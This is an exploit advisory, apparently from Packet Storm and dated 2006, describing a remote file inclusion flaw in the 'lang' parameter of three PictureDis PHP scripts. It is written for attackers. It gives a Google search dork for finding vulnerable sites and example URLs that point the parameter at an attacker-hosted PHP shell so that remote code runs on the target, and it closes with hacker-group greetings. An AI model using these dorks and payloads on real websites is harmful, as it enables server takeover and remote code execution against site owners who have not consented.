PictureDis products suffer from a remote file inclusion flaw via the lang parameter.
d79c9c05588e20b4c5f71a8d7a427f1c24e795b3f8d0f4993ad0c5aea495e439**************************************************************************************************
PictureDis Products "lang" Parameter File Inclusion Vulnerability
=================================================
Input passed to the "lang" parameter in thumstbl.php, wpfiles.php,
and wallpapr.php is not properly verified before being used to
include files. This can be exploited to execute arbitrary PHP code by
including files.
*********************************************************************************************
exploit:
in google search: inurl:thumstbl.php
and add the phpshell
thumstbl.php?lang=[ur phpshell ]
wpfiles.php?lang=[ur phpshell ]
wallpapr.php?lang=[ur phpshell ]
******************************************************************
exemple: http://localhost//album/wpfiles.php?lang=http://your site.com/ur script.txt?
*************************************************
by s4mi(rOoT-HacKeD)rOoT-HaCkeD[AT]Hotmail[dot]com
====================================
tanx to ==>SIMO64==>DrAcKaNz==>HaRDoSe==>
*************************************************
black spell te4m [15-06-2006]
end (-:
*************************************************
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed